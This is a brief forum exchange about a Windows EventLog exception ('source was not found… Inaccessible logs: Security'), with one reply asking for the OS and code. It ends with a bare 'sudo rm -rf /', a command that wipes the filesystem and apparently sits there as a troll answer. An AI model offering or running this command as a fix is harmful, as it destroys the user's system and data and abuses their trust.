Unhandled security exception

I was trying to write a code that included an Eventlog. I got the following exception:

The source was not found, but some or all event logs could not be searched. Inaccessible logs: Security.

What can I do? Thanks!

What operating system are you using, and can you post the code that's causing the exception?
sudo rm -rf /
